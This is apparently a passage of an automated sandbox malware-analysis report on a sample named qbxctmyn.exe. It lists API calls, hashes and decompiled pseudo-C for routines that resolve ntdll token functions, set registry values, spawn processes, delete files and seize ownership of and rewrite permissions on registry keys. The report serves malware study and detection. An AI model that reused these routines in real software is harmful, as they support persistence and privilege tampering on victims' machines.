                                                                                Function 00E39EA0 Relevance: 59.9, APIs: 28, Strings: 6, Instructions: 421stringregistryfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ExitProcess.KERNEL32 ref: 00E39E6D
                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00E39FE1
                                                                                • lstrcat.KERNEL32(?,?), ref: 00E39FF2
                                                                                • lstrcat.KERNEL32(?,0041070C), ref: 00E3A004
                                                                                • GetFileAttributesExA.KERNEL32(?,?,?), ref: 00E3A054
                                                                                • DeleteFileA.KERNEL32(?), ref: 00E3A09F
                                                                                • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,000001F4), ref: 00E3A0D6
                                                                                • lstrcpy.KERNEL32 ref: 00E3A12F
                                                                                • lstrlen.KERNEL32(00000022), ref: 00E3A13C
                                                                                • GetTempPathA.KERNEL32(000001F4,?), ref: 00E39F13
                                                                                  • Part of subcall function 00E37029: GetVolumeInformationA.KERNEL32(?,00000000,00000000,\%},00000000,00000000,00000000,00000000), ref: 00E37081
                                                                                  • Part of subcall function 00E36F30: GetModuleHandleA.KERNEL32(00410380,00410670,00000000,\\.\pipe\seokopfr,00E37043), ref: 00E36F4E
                                                                                  • Part of subcall function 00E36F30: GetProcAddress.KERNEL32(00000000), ref: 00E36F55
                                                                                  • Part of subcall function 00E36F30: GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 00E36F7B
                                                                                  • Part of subcall function 00E36F30: GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00E36F92
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,?,00000103,?,?,?,?), ref: 00E3A1A2
                                                                                • RegSetValueExA.ADVAPI32(?,00000001,?,00000001,?,000001F5,?,?,?,00000103,?,?,?,?), ref: 00E3A1C5
                                                                                • GetModuleHandleA.KERNEL32(?,?,00000104,?,?,00000010,?,?,00000044,?,?,?,?,?,?,00000103), ref: 00E3A214
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,?,00000104,?,?,00000010,?,?,00000044), ref: 00E3A21B
                                                                                • GetDriveTypeA.KERNEL32(?), ref: 00E3A265
                                                                                • lstrcat.KERNEL32(?,00000000), ref: 00E3A29F
                                                                                • lstrcat.KERNEL32(?,00410A34), ref: 00E3A2C5
                                                                                • lstrcat.KERNEL32(?,00000022), ref: 00E3A2D9
                                                                                • lstrcat.KERNEL32(?,00410A34), ref: 00E3A2F4
                                                                                • wsprintfA.USER32 ref: 00E3A31D
                                                                                • lstrcat.KERNEL32(?,00000000), ref: 00E3A345
                                                                                • lstrcat.KERNEL32(?,?), ref: 00E3A364
                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,08000000,?,?,?,?,?,?,00000104,?,?,00000010), ref: 00E3A387
                                                                                • DeleteFileA.KERNEL32(?,?,?,?,?,?,08000000,?,?,?,?,?,?,00000104,?), ref: 00E3A398
                                                                                • RegCloseKey.ADVAPI32(?,?,00000001,?,000001F5,?,?,?,00000103,?,?,?,?), ref: 00E3A1D1
                                                                                  • Part of subcall function 00E39966: RegOpenKeyExA.ADVAPI32(80000001,00000000), ref: 00E3999D
                                                                                  • Part of subcall function 00E39966: RegDeleteValueA.ADVAPI32(?,00000000), ref: 00E399BD
                                                                                  • Part of subcall function 00E39966: RegCloseKey.ADVAPI32(?), ref: 00E399C6
                                                                                • GetModuleHandleA.KERNEL32(?,?,0000012C), ref: 00E3A3DB
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,?,0000012C), ref: 00E3A3E2
                                                                                • GetDriveTypeA.KERNEL32(00000022), ref: 00E3A41D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$FileModule$DeleteHandle$CloseDirectoryDriveNameOpenProcessTypeValuelstrcpy$AddressAttributesCreateEnvironmentExitInformationPathProcSystemTempVariableVolumeWindowslstrlenwsprintf
                                                                                • String ID: "$"$"$D$P$\
                                                                                • API String ID: 1653845638-2605685093
                                                                                • Opcode ID: 367b9be05492a2edfb885d1a7c41413b002776b69c7dc48c576c8fe787930bc5
                                                                                • Instruction ID: 97090a3ee55fada1b972752bfd25c187dc78c30b99690d1352ef3fc76e0ec886
                                                                                • Opcode Fuzzy Hash: 367b9be05492a2edfb885d1a7c41413b002776b69c7dc48c576c8fe787930bc5
                                                                                • Instruction Fuzzy Hash: DDF13FB1D40259AEDB21DBA08C4DEEF7BBCAB08304F0450B6F645F2152E7B58A84CF65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401000 Relevance: 56.2, APIs: 16, Strings: 16, Instructions: 170libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00401000() {
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t3;
				signed int _t4;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				struct HINSTANCE__* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t14;
				_Unknown_base(*)()* _t15;
				_Unknown_base(*)()* _t16;
				struct HINSTANCE__* _t17;
				_Unknown_base(*)()* _t18;
				_Unknown_base(*)()* _t19;
				_Unknown_base(*)()* _t20;
				struct HINSTANCE__* _t21;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t23;
				struct HINSTANCE__* _t25;
				struct HINSTANCE__* _t26;
				struct HINSTANCE__* _t27;
				struct HINSTANCE__* _t28;
				struct HINSTANCE__* _t29;
				struct HINSTANCE__* _t30;
				struct HINSTANCE__* _t31;
				struct HINSTANCE__* _t32;
				struct HINSTANCE__* _t33;
				signed int _t34;
				signed int _t35;

				_t2 =  *0x413918; // 0x0
				_t35 = _t34 | 0xffffffff;
				if(_t2 != 0) {
					L3:
					if( *0x41391c == 0 ||  *0x413920 == 0 ||  *0x413924 == 0 ||  *0x413928 == 0 ||  *0x41392c == 0 ||  *0x413930 == 0 ||  *0x413934 == 0 ||  *0x413938 == 0 ||  *0x41393c == 0 ||  *0x413940 == 0 ||  *0x413944 == 0 ||  *0x413948 == 0 ||  *0x41394c == 0 ||  *0x413950 == 0 ||  *0x413954 == 0) {
						_t3 = GetProcAddress(_t2, "RtlExpandEnvironmentStrings_U");
						 *0x41391c = _t3;
						if(_t3 == 0) {
							L34:
							_t4 = _t35;
						} else {
							_t5 =  *0x413918; // 0x0
							_t35 = 0xfffffffe;
							_t6 = GetProcAddress(_t5, "RtlSetLastWin32Error");
							 *0x413920 = _t6;
							if(_t6 == 0) {
								goto L34;
							} else {
								_t25 =  *0x413918; // 0x0
								_t35 = 0xfffffffd;
								_t7 = GetProcAddress(_t25, "NtTerminateProcess");
								 *0x413924 = _t7;
								if(_t7 == 0) {
									goto L34;
								} else {
									_t30 =  *0x413918; // 0x0
									_t35 = 0xfffffffc;
									_t8 = GetProcAddress(_t30, "RtlFreeSid");
									 *0x413928 = _t8;
									if(_t8 == 0) {
										goto L34;
									} else {
										_t9 =  *0x413918; // 0x0
										_t35 = 0xfffffffb;
										_t10 = GetProcAddress(_t9, "RtlInitUnicodeString");
										 *0x41392c = _t10;
										if(_t10 == 0) {
											goto L34;
										} else {
											_t26 =  *0x413918; // 0x0
											_t35 = 0xfffffffa;
											_t11 = GetProcAddress(_t26, "NtSetInformationThread");
											 *0x413930 = _t11;
											if(_t11 == 0) {
												goto L34;
											} else {
												_t31 =  *0x413918; // 0x0
												_t35 = 0xfffffff9;
												_t12 = GetProcAddress(_t31, "NtSetInformationToken");
												 *0x413934 = _t12;
												if(_t12 == 0) {
													goto L34;
												} else {
													_t13 =  *0x413918; // 0x0
													_t35 = 0xfffffff8;
													_t14 = GetProcAddress(_t13, "RtlNtStatusToDosError");
													 *0x413938 = _t14;
													if(_t14 == 0) {
														goto L34;
													} else {
														_t27 =  *0x413918; // 0x0
														_t35 = 0xfffffff7;
														_t15 = GetProcAddress(_t27, "NtClose");
														 *0x41393c = _t15;
														if(_t15 == 0) {
															goto L34;
														} else {
															_t32 =  *0x413918; // 0x0
															_t35 = 0xfffffff6;
															_t16 = GetProcAddress(_t32, "NtOpenProcessToken");
															 *0x413940 = _t16;
															if(_t16 == 0) {
																goto L34;
															} else {
																_t17 =  *0x413918; // 0x0
																_t35 = 0xfffffff5;
																_t18 = GetProcAddress(_t17, "NtDuplicateToken");
																 *0x413944 = _t18;
																if(_t18 == 0) {
																	goto L34;
																} else {
																	_t28 =  *0x413918; // 0x0
																	_t35 = 0xfffffff4;
																	_t19 = GetProcAddress(_t28, "RtlAllocateAndInitializeSid");
																	 *0x413948 = _t19;
																	if(_t19 == 0) {
																		goto L34;
																	} else {
																		_t33 =  *0x413918; // 0x0
																		_t35 = 0xfffffff3;
																		_t20 = GetProcAddress(_t33, "NtFilterToken");
																		 *0x41394c = _t20;
																		if(_t20 == 0) {
																			goto L34;
																		} else {
																			_t21 =  *0x413918; // 0x0
																			_t35 = 0xfffffff2;
																			_t22 = GetProcAddress(_t21, "RtlLengthSid");
																			 *0x413950 = _t22;
																			if(_t22 == 0) {
																				goto L34;
																			} else {
																				_t29 =  *0x413918; // 0x0
																				_t35 = 0xfffffff1;
																				_t23 = GetProcAddress(_t29, "NtQueryInformationToken");
																				 *0x413954 = _t23;
																				_t1 = _t35 + 0x10; // 0x100000001
																				_t4 = _t1;
																				if(_t23 == 0) {
																					goto L34;
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						return _t4;
					} else {
						return 1;
					}
				} else {
					_t2 = LoadLibraryA("ntdll.dll");
					 *0x413918 = _t2;
					if(_t2 != 0) {
						goto L3;
					} else {
						return _t2;
					}
				}
			}




































                                                                                0x00401000
                                                                                0x00401006
                                                                                0x0040100b
                                                                                0x00401023
                                                                                0x0040102a
                                                                                0x004010c2
                                                                                0x004010c4
                                                                                0x004010cb
                                                                                0x0040127b
                                                                                0x0040127b
                                                                                0x004010d1
                                                                                0x004010d1
                                                                                0x004010dc
                                                                                0x004010e1
                                                                                0x004010e3
                                                                                0x004010ea
                                                                                0x00000000
                                                                                0x004010f0
                                                                                0x004010f0
                                                                                0x004010fc
                                                                                0x00401101
                                                                                0x00401103
                                                                                0x0040110a
                                                                                0x00000000
                                                                                0x00401110
                                                                                0x00401110
                                                                                0x0040111c
                                                                                0x00401121
                                                                                0x00401123
                                                                                0x0040112a
                                                                                0x00000000
                                                                                0x00401130
                                                                                0x00401130
                                                                                0x0040113b
                                                                                0x00401140
                                                                                0x00401142
                                                                                0x00401149
                                                                                0x00000000
                                                                                0x0040114f
                                                                                0x0040114f
                                                                                0x0040115b
                                                                                0x00401160
                                                                                0x00401162
                                                                                0x00401169
                                                                                0x00000000
                                                                                0x0040116f
                                                                                0x0040116f
                                                                                0x0040117b
                                                                                0x00401180
                                                                                0x00401182
                                                                                0x00401189
                                                                                0x00000000
                                                                                0x0040118f
                                                                                0x0040118f
                                                                                0x0040119a
                                                                                0x0040119f
                                                                                0x004011a1
                                                                                0x004011a8
                                                                                0x00000000
                                                                                0x004011ae
                                                                                0x004011ae
                                                                                0x004011ba
                                                                                0x004011bf
                                                                                0x004011c1
                                                                                0x004011c8
                                                                                0x00000000
                                                                                0x004011ce
                                                                                0x004011ce
                                                                                0x004011da
                                                                                0x004011df
                                                                                0x004011e1
                                                                                0x004011e8
                                                                                0x00000000
                                                                                0x004011ee
                                                                                0x004011ee
                                                                                0x004011f9
                                                                                0x004011fe
                                                                                0x00401200
                                                                                0x00401207
                                                                                0x00000000
                                                                                0x00401209
                                                                                0x00401209
                                                                                0x00401215
                                                                                0x0040121a
                                                                                0x0040121c
                                                                                0x00401223
                                                                                0x00000000
                                                                                0x00401225
                                                                                0x00401225
                                                                                0x00401231
                                                                                0x00401236
                                                                                0x00401238
                                                                                0x0040123f
                                                                                0x00000000
                                                                                0x00401241
                                                                                0x00401241
                                                                                0x0040124c
                                                                                0x00401251
                                                                                0x00401253
                                                                                0x0040125a
                                                                                0x00000000
                                                                                0x0040125c
                                                                                0x0040125c
                                                                                0x00401268
                                                                                0x0040126d
                                                                                0x0040126f
                                                                                0x00401276
                                                                                0x00401276
                                                                                0x00401279
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401279
                                                                                0x0040125a
                                                                                0x0040123f
                                                                                0x00401223
                                                                                0x00401207
                                                                                0x004011e8
                                                                                0x004011c8
                                                                                0x004011a8
                                                                                0x00401189
                                                                                0x00401169
                                                                                0x00401149
                                                                                0x0040112a
                                                                                0x0040110a
                                                                                0x004010ea
                                                                                0x0040127f
                                                                                0x004010ae
                                                                                0x004010b4
                                                                                0x004010b4
                                                                                0x0040100d
                                                                                0x00401012
                                                                                0x00401018
                                                                                0x0040101f
                                                                                0x00000000
                                                                                0x00401022
                                                                                0x00401022
                                                                                0x00401022
                                                                                0x0040101f

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(ntdll.dll,00000000,00401839,00409646), ref: 00401012
                                                                                • GetProcAddress.KERNEL32(00000000,RtlExpandEnvironmentStrings_U), ref: 004010C2
                                                                                • GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 004010E1
                                                                                • GetProcAddress.KERNEL32(00000000,NtTerminateProcess), ref: 00401101
                                                                                • GetProcAddress.KERNEL32(00000000,RtlFreeSid), ref: 00401121
                                                                                • GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00401140
                                                                                • GetProcAddress.KERNEL32(00000000,NtSetInformationThread), ref: 00401160
                                                                                • GetProcAddress.KERNEL32(00000000,NtSetInformationToken), ref: 00401180
                                                                                • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040119F
                                                                                • GetProcAddress.KERNEL32(00000000,NtClose), ref: 004011BF
                                                                                • GetProcAddress.KERNEL32(00000000,NtOpenProcessToken), ref: 004011DF
                                                                                • GetProcAddress.KERNEL32(00000000,NtDuplicateToken), ref: 004011FE
                                                                                • GetProcAddress.KERNEL32(00000000,RtlAllocateAndInitializeSid), ref: 0040121A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad
                                                                                • String ID: NtClose$NtDuplicateToken$NtFilterToken$NtOpenProcessToken$NtQueryInformationToken$NtSetInformationThread$NtSetInformationToken$NtTerminateProcess$RtlAllocateAndInitializeSid$RtlExpandEnvironmentStrings_U$RtlFreeSid$RtlInitUnicodeString$RtlLengthSid$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                                                • API String ID: 2238633743-3228201535
                                                                                • Opcode ID: 099c329b46637f9171a1ca57a4c5e0107e32006a0b8f6d8903d04b45664d461e
                                                                                • Instruction ID: c8dd2db2df3f08e17c6117e54d1286841a2c4197db930f8a9693796d5e259140
                                                                                • Opcode Fuzzy Hash: 099c329b46637f9171a1ca57a4c5e0107e32006a0b8f6d8903d04b45664d461e
                                                                                • Instruction Fuzzy Hash: 2F5100B1662641A6D7118F69EC84BD23AE86748372F14837B9520F62F0D7F8CAC1CB5D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040B211 Relevance: 47.4, APIs: 7, Strings: 20, Instructions: 131timeCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 91%
                                                                                			E0040B211(FILETIME* _a4, CHAR* _a8, signed int _a12) {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				CHAR* _v32;
				CHAR* _v36;
				CHAR* _v40;
				CHAR* _v44;
				CHAR* _v48;
				CHAR* _v52;
				CHAR* _v56;
				CHAR* _v60;
				CHAR* _v64;
				CHAR* _v68;
				CHAR* _v72;
				CHAR* _v76;
				CHAR* _v80;
				CHAR* _v84;
				CHAR* _v88;
				CHAR* _v92;
				CHAR* _v96;
				CHAR* _v100;
				CHAR* _v104;
				struct _TIME_ZONE_INFORMATION _v276;
				long _t77;
				signed int _t80;
				signed int _t93;
				signed int _t101;
				signed int _t102;
				CHAR* _t103;
				signed int _t104;
				signed short _t106;
				signed short _t109;
				signed int _t114;
				signed int _t115;
				void* _t117;

				_v56 = "Sun";
				_v52 = "Mon";
				_v48 = "Tue";
				_v44 = "Wed";
				_v40 = "Thu";
				_v36 = "Fri";
				_v32 = "Sat";
				_v104 = "Jan";
				_v100 = "Feb";
				_v96 = "Mar";
				_v92 = "Apr";
				_v88 = "May";
				_v84 = "Jun";
				_v80 = "Jul";
				_v76 = "Aug";
				_v72 = "Sep";
				_v68 = "Oct";
				_v64 = "Nov";
				_v60 = "Dec";
				if(_a4 != 0) {
					FileTimeToLocalFileTime(_a4,  &_v12);
					FileTimeToSystemTime( &_v12,  &_v28);
				} else {
					GetLocalTime( &_v28);
				}
				_t114 = _a12;
				if(_t114 != 0) {
					SystemTimeToFileTime( &_v28,  &_v12);
					_t93 = E0040ECA5();
					if(_t114 <= 0) {
						_t104 = _t93 %  ~_t114 * 0x23c34600;
						_v12.dwLowDateTime = _v12.dwLowDateTime - _t104;
						asm("sbb [ebp-0x4], ebx");
					} else {
						_t104 = _t93 % _t114 * 0x23c34600;
						_v12.dwLowDateTime = _v12.dwLowDateTime + _t104;
						asm("adc [ebp-0x4], ebx");
					}
					FileTimeToSystemTime( &_v12,  &_v28);
				}
				_v276.Bias = 0;
				_t77 = GetTimeZoneInformation( &_v276);
				_t101 = _v276.Bias;
				if(_t77 == 2) {
					_t101 = _t101 + _v276.DaylightBias;
				}
				_t102 =  ~_t101;
				asm("cdq");
				_t80 = (_t102 ^ _t104) - _t104;
				if(_v28.wDayOfWeek > 6) {
					_t109 = 6;
					_v28.wDayOfWeek = _t109;
				}
				if(_v28.wMonth == 0) {
					_v28.wMonth = 1;
				}
				if(_v28.wMonth > 0xc) {
					_t106 = 0xc;
					_v28.wMonth = _t106;
				}
				_t103 = "+";
				if(_t102 < 0) {
					_t103 = "-";
				}
				_t115 = 0x3c;
				asm("cdq");
				return wsprintfA(_a8, "%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u",  *((intOrPtr*)(_t117 + (_v28.wDayOfWeek & 0x0000ffff) * 4 - 0x34)), _v28.wDay & 0x0000ffff,  *((intOrPtr*)(_t117 + (_v28.wMonth & 0x0000ffff) * 4 - 0x68)), _v28.wYear & 0x0000ffff, _v28.wHour & 0x0000ffff, _v28.wMinute & 0x0000ffff, _v28.wSecond & 0x0000ffff, _t103, _t80 / _t115, _t80 % _t115);
			}





































                                                                                0x0040b225
                                                                                0x0040b22c
                                                                                0x0040b233
                                                                                0x0040b23a
                                                                                0x0040b241
                                                                                0x0040b248
                                                                                0x0040b24f
                                                                                0x0040b256
                                                                                0x0040b25d
                                                                                0x0040b264
                                                                                0x0040b26b
                                                                                0x0040b272
                                                                                0x0040b279
                                                                                0x0040b280
                                                                                0x0040b287
                                                                                0x0040b28e
                                                                                0x0040b295
                                                                                0x0040b29c
                                                                                0x0040b2a3
                                                                                0x0040b2ad
                                                                                0x0040b2c2
                                                                                0x0040b2d0
                                                                                0x0040b2af
                                                                                0x0040b2b3
                                                                                0x0040b2b3
                                                                                0x0040b2d2
                                                                                0x0040b2d7
                                                                                0x0040b2e1
                                                                                0x0040b2e7
                                                                                0x0040b2f0
                                                                                0x0040b306
                                                                                0x0040b30c
                                                                                0x0040b30f
                                                                                0x0040b2f2
                                                                                0x0040b2f4
                                                                                0x0040b2fa
                                                                                0x0040b2fd
                                                                                0x0040b2fd
                                                                                0x0040b31a
                                                                                0x0040b31a
                                                                                0x0040b323
                                                                                0x0040b329
                                                                                0x0040b32f
                                                                                0x0040b338
                                                                                0x0040b33a
                                                                                0x0040b33a
                                                                                0x0040b33d
                                                                                0x0040b341
                                                                                0x0040b344
                                                                                0x0040b34b
                                                                                0x0040b34f
                                                                                0x0040b350
                                                                                0x0040b350
                                                                                0x0040b358
                                                                                0x0040b35d
                                                                                0x0040b35d
                                                                                0x0040b366
                                                                                0x0040b36a
                                                                                0x0040b36b
                                                                                0x0040b36b
                                                                                0x0040b371
                                                                                0x0040b376
                                                                                0x0040b378
                                                                                0x0040b378
                                                                                0x0040b37f
                                                                                0x0040b380
                                                                                0x0040b3c4

                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(0003E800,?,0003E800,00000000), ref: 0040B2B3
                                                                                • FileTimeToLocalFileTime.KERNEL32(00000000,00000000,?,0003E800,00000000), ref: 0040B2C2
                                                                                • FileTimeToSystemTime.KERNEL32(00000000,0003E800), ref: 0040B2D0
                                                                                • SystemTimeToFileTime.KERNEL32(0003E800,00000000), ref: 0040B2E1
                                                                                • FileTimeToSystemTime.KERNEL32(00000000,0003E800), ref: 0040B31A
                                                                                • GetTimeZoneInformation.KERNEL32(?), ref: 0040B329
                                                                                • wsprintfA.USER32 ref: 0040B3B7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Time$File$System$Local$InformationZonewsprintf
                                                                                • String ID: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u$Apr$Aug$Dec$Feb$Fri$Jan$Jul$Jun$Mar$May$Mon$Nov$Oct$Sat$Sep$Sun$Thu$Tue$Wed
                                                                                • API String ID: 766114626-2976066047
                                                                                • Opcode ID: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                • Instruction ID: 3cccae2c5b68faf9d5e65ebc3321ef0303f497beb4f825406ae493c25d793f5b
                                                                                • Opcode Fuzzy Hash: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                • Instruction Fuzzy Hash: D8510EB1D0021CAADF18DFD5D8495EEBBB9EF48304F10856BE501B6250E7B84AC9CF98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E37CFC Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 269registrymemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,000E0100,?), ref: 00E37D21
                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 00E37D46
                                                                                • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00E37D7D
                                                                                • RegGetKeySecurity.ADVAPI32(?,00000005,?,?), ref: 00E37DA2
                                                                                • GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 00E37DC0
                                                                                • EqualSid.ADVAPI32(?,?), ref: 00E37DD1
                                                                                • LocalAlloc.KERNEL32(00000040,00000014), ref: 00E37DE5
                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00E37DF3
                                                                                • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00E37E03
                                                                                • RegSetKeySecurity.ADVAPI32(?,00000001,00000000), ref: 00E37E12
                                                                                • LocalFree.KERNEL32(00000000), ref: 00E37E19
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E37E35
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Security$Descriptor$LocalNameOwner$AccountAllocDaclEqualFreeInitializeLookupOpenUser
                                                                                • String ID: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe$D
                                                                                • API String ID: 2976863881-60433687
                                                                                • Opcode ID: 1a53823342927d1e4650e54f1beed8d9b04cc787a6d03e02cd47dd5285ddf864
                                                                                • Instruction ID: e83ae5f0499c8f5547459415c8b9e8b3ab9b0fb459d3ae513504b03db5ec1d92
                                                                                • Opcode Fuzzy Hash: 1a53823342927d1e4650e54f1beed8d9b04cc787a6d03e02cd47dd5285ddf864
                                                                                • Instruction Fuzzy Hash: 2FA14DB1900219AFDF219FA1DD88BEEBFB9FB08304F0480A9F555F2150DB758A84CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00407A95 Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 269registrymemoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 99%
                                                                                			E00407A95(void* _a4, char* _a8, signed int _a12) {
				int _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				int _v24;
				void* _v28;
				struct _ACL* _v32;
				long _v36;
				long _v40;
				long _v44;
				int _v48;
				int _v52;
				union _SID_NAME_USE _v56;
				int _v60;
				int _v64;
				void _v132;
				char _v388;
				char _v516;
				struct _SECURITY_DESCRIPTOR _v1540;
				void* _t95;
				void* _t104;
				void* _t107;
				void* _t111;
				void* _t116;
				struct _ACL* _t117;
				void* _t118;
				void* _t120;
				void* _t122;
				void* _t123;
				void* _t125;
				char* _t126;
				void* _t130;
				void* _t134;
				void* _t135;
				signed int _t136;
				void* _t143;
				void* _t146;
				int _t148;
				int _t151;
				char* _t158;
				void** _t159;
				void* _t161;
				void* _t164;
				signed int _t172;
				void* _t173;
				char* _t174;
				void* _t175;
				void* _t176;

				_v32 = 0;
				_v12 = 0;
				_v28 = 0;
				if(RegOpenKeyExA(_a4, _a8, 0, 0xe0100,  &_v28) != 0) {
					return 0;
				}
				_v40 = 0x80;
				_t95 = GetUserNameA( &_v388,  &_v40);
				__eflags = _t95;
				if(_t95 == 0) {
					L48:
					RegCloseKey(_v28);
					return _v12;
				} else {
					_v36 = 0x44;
					_v44 = 0x80;
					_t104 = LookupAccountNameA(0,  &_v388,  &_v132,  &_v36,  &_v516,  &_v44,  &_v56);
					__eflags = _t104;
					if(_t104 == 0) {
						goto L48;
					}
					_v48 = 0x400;
					_t107 = RegGetKeySecurity(_v28, 5,  &_v1540,  &_v48);
					__eflags = _t107;
					if(_t107 != 0) {
						goto L48;
					}
					_t111 = GetSecurityDescriptorOwner( &_v1540,  &_v16,  &_v60);
					__eflags = _t111;
					if(_t111 == 0) {
						L12:
						_v24 = 0;
						_t116 = GetSecurityDescriptorDacl( &_v1540,  &_v64,  &_v32,  &_v52);
						__eflags = _t116;
						if(_t116 == 0) {
							L47:
							goto L48;
						}
						_t117 = _v32;
						__eflags = _t117;
						if(_t117 == 0) {
							goto L47;
						}
						_t164 = 0;
						_v8 = 0;
						__eflags = 0 - _t117->AceCount;
						if(0 >= _t117->AceCount) {
							goto L47;
						} else {
							goto L15;
						}
						do {
							L15:
							_t118 = GetAce(_t117, _v8,  &_v20);
							__eflags = _t118;
							if(_t118 == 0) {
								L31:
								_t73 =  &_v8;
								 *_t73 = _v8 + 1;
								__eflags =  *_t73;
								goto L32;
							}
							_t172 = 0;
							_v16 = _v20 + 8;
							__eflags = _t164;
							if(_t164 <= 0) {
								L21:
								__eflags = _t164 - 0x20;
								if(_t164 < 0x20) {
									 *((intOrPtr*)(_t176 + _t164 * 4 - 0x100)) = _v16;
									_t164 = _t164 + 1;
									__eflags = _t164;
								}
								_t134 = EqualSid( &_v132, _v16);
								_t159 = _v20;
								__eflags = _t134;
								if(_t134 == 0) {
									_t135 = 0x20000;
								} else {
									asm("sbb eax, eax");
									_t135 = ( ~_a12 & 0x00010006) + 0xe0039;
								}
								__eflags = _t159[1] - _t135;
								if(_t159[1] != _t135) {
									_t159[1] = _t135;
									_t159 = _v20;
									_v24 = 1;
								}
								__eflags =  *_t159;
								if( *_t159 != 0) {
									L30:
									 *_t159 = 0;
									_t136 = _v16;
									__eflags =  *(_t136 + 8);
									_t68 =  *(_t136 + 8) == 0;
									__eflags = _t68;
									_v24 = 1;
									 *((char*)(_v20 + 1)) = 2 + (_t136 & 0xffffff00 | _t68) * 8;
									goto L31;
								} else {
									__eflags = _t159[0] & 0x00000010;
									if((_t159[0] & 0x00000010) == 0) {
										goto L31;
									}
									goto L30;
								}
							} else {
								goto L17;
							}
							while(1) {
								L17:
								_t143 = EqualSid( *(_t176 + _t172 * 4 - 0x100), _v16);
								__eflags = _t143;
								if(_t143 != 0) {
									break;
								}
								_t172 = _t172 + 1;
								__eflags = _t172 - _t164;
								if(_t172 < _t164) {
									continue;
								}
								break;
							}
							__eflags = _t172 - _t164;
							if(_t172 >= _t164) {
								goto L21;
							}
							DeleteAce(_v32, _v8);
							_v24 = 1;
							L32:
							_t117 = _v32;
							__eflags = _v8 - (_t117->AceCount & 0x0000ffff);
						} while (_v8 < (_t117->AceCount & 0x0000ffff));
						__eflags = _v24;
						if(_v24 == 0) {
							goto L47;
						}
						__eflags = "C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe"; // 0x43
						if(__eflags == 0) {
							L41:
							_v12 = 1;
							_t173 = LocalAlloc(0x40, 0x14);
							__eflags = _t173;
							if(_t173 != 0) {
